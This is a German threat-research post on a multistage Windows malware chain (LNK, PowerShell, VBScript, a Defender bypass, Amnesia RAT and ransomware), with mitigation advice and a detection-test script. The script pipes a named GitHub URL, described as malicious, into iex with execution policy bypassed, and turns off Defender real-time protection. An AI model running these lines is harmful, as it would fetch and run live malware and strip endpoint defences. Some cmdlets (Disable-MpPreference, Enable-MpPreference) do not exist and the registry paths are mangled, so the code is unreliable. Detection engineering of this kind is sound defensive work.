SOC Prime Bias: Hoch

04 Feb 2026 14:20 UTC

Ein genauer Blick auf eine mehrstufige Windows-Malware-Operation

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Folgen
Ein genauer Blick auf eine mehrstufige Windows-Malware-Operation
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Zusammenfassung

FortiGuard Labs identifizierte eine mehrstufige Windows-Einbruchskette, die mit einer bösartigen LNK-Datei beginnt, die innerhalb eines komprimierten Archivs bereitgestellt wird. Die Verknüpfung startet einen ersten PowerShell-Loader, der nachfolgende Skripte von GitHub abruft und später die Kontrolle an einen verschleierten VBScript-Orchestrator übergibt. Der Workflow versucht dann, die Endpunktabwehr zu schwächen, indem er Microsoft Defender deaktiviert, das Defendnot-Dienstprogramm bereitstellt und sowohl Amnesia RAT als auch Hakuna Matata Ransomware bereitstellt. Der Vorgang endet mit dem Ablegen einer WinLocker-Komponente, die den Desktop sperrt, um die Wiederherstellung zu stören und Opfer unter Druck zu setzen.

Untersuchung

Ermittler rekonstruierten den Ausführungsweg von der durch LNK ausgelösten PowerShell-Phase zu einem VBScript, das Nutzdaten im Speicher wiederherstellt, was schließlich zur Bereitstellung von Ransomware und Desktop-Sperrverhalten führt. Abwehrmaßnahmen wurden durch gezielte Registry-Änderungen und durch das Injizieren einer Defendnot-DLL in Taskmgr.exe umgangen. Persistenz wurde durch eine Kombination von Run-Key-Einträgen und Startup-Ordner-Artefakten implementiert, um die Kette nach der Anmeldung erneut auszulösen.

Abschwächung

Überwachen Sie auf verdächtige registrybasierte Richtlinienänderungen unter HKLMSOFTWAREPoliciesMicrosoftWindows Defender und HKCUSoftwareMicrosoftWindowsCurrentVersionPolicies. Blockieren Sie den Egress zu bekannten bösartigen GitHub- und Dropbox-URLs, die zum Staging verwendet werden, und alarmieren Sie bei PowerShell-Download-und-Execute-Mustern, die von LNK-Starts ausgehen. Setzen Sie Anwendungs-Whitelisting durch und verschärfen Sie die PowerShell-Ausführungsrichtlinien, um skriptbasierte anfängliche Zugriffe zu reduzieren.

Reaktion

Wenn erkannt, isolieren Sie den Endpunkt, stellen die Defender-bezogenen Registry-Einstellungen in einen bekannten guten Zustand wieder her und entfernen bösartige Dateien und Persistenzeinträge. Suchen Sie nach aktiven Amnesia RAT Prozessen und assoziierter Netzwerkaktivität und überprüfen Sie, ob Ransomware-Ausführung stattgefunden hat. Führen Sie eine vollständige forensische Untersuchung durch, um den Umfang des Schadens zu bestimmen und Überreste zu beseitigen, dann stellen Sie Systeme von sauberen Backups wieder her, wo dies möglich ist.

Angriffsablauf

Simulation Execution

Voraussetzung: Der Telemetrie- & Baseline-Pre-Flight-Check muss bestanden sein.

Begründung: Dieser Abschnitt beschreibt die präzise Ausführung der gegnerischen Technik (TTP), die dazu bestimmt ist, die Erkennungsregel auszulösen. Die Befehle und Erzählungen MÜSSEN direkt die identifizierten TTPs widerspiegeln und darauf abzielen, die genaue Telemetrie zu erzeugen, die von der Erkennungslogik erwartet wird. Abstrakte oder nicht zusammenhängende Beispiele führen zu Fehldiagnosen.

  • Angriffserzählung & Befehle:
    Ein Angreifer, der anfänglichen Zugriff auf den Endpunkt erlangt hat, möchte eine bösartige PowerShell-Nutzlast herunterladen und ausführen, während er die Standardeinstellung der Ausführungsrichtlinie umgeht. Sie nutzen Invoke-Expression (iex) kombiniert mit Invoke-WebRequest (irm) um ein Skript von einer entfernten GitHub-Raw-URL abzurufen und es unter -ExecutionPolicy Bypassausführen zu lassen. Nach der Einrichtung der Persistenz deaktivieren sie die Echtzeitüberwachung von Windows Defender, um die Erkennung der nachfolgenden Nutzlasten zu vermeiden. Diese Schritte erzeugen direkt die Befehlszeilen-Strings, für die die Sigma-Regel überwacht.

  • Regressionstest-Skript:

    # --------------------------------------------------------------
    # Schritt 1 – Führen Sie das Remote-Skript mit ExecutionPolicy Bypass aus
    # --------------------------------------------------------------
    $maliciousUrl = "https://github.com/Mafin111/MafinREP111/raw/refs/heads/main/ps1/kira.ps1"
    powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "irm '$maliciousUrl' | iex"
    
    # --------------------------------------------------------------
    # Schritt 2 – Deaktivieren Sie die Echtzeitüberwachung von Windows Defender
    # --------------------------------------------------------------
    # Deaktivieren Sie den Echtzeitschutz
    Disable-MpPreference -DisableRealtimeMonitoring $true
    # Eine Ausschlusspfad hinzufügen (simuliert)
    Add-MpPreference -ExclusionPath "C:TempExcludeFolder"
  • Aufräumbefehle:

    # Reaktivieren Sie die Echtzeitüberwachung von Windows Defender
    Enable-MpPreference -DisableRealtimeMonitoring $false
    
    # Entfernen Sie den Ausschlusspfad (falls vorhanden)
    Remove-MpPreference -ExclusionPath "C:TempExcludeFolder" -ErrorAction SilentlyContinue
    
    # Stoppen Sie alle verbleibenden PowerShell-Prozesse, die vom Skript gestartet wurden
    Get-Process -Name powershell | Where-Object {$_.StartInfo.Arguments -match 'kira.ps1'} | Stop-Process -Force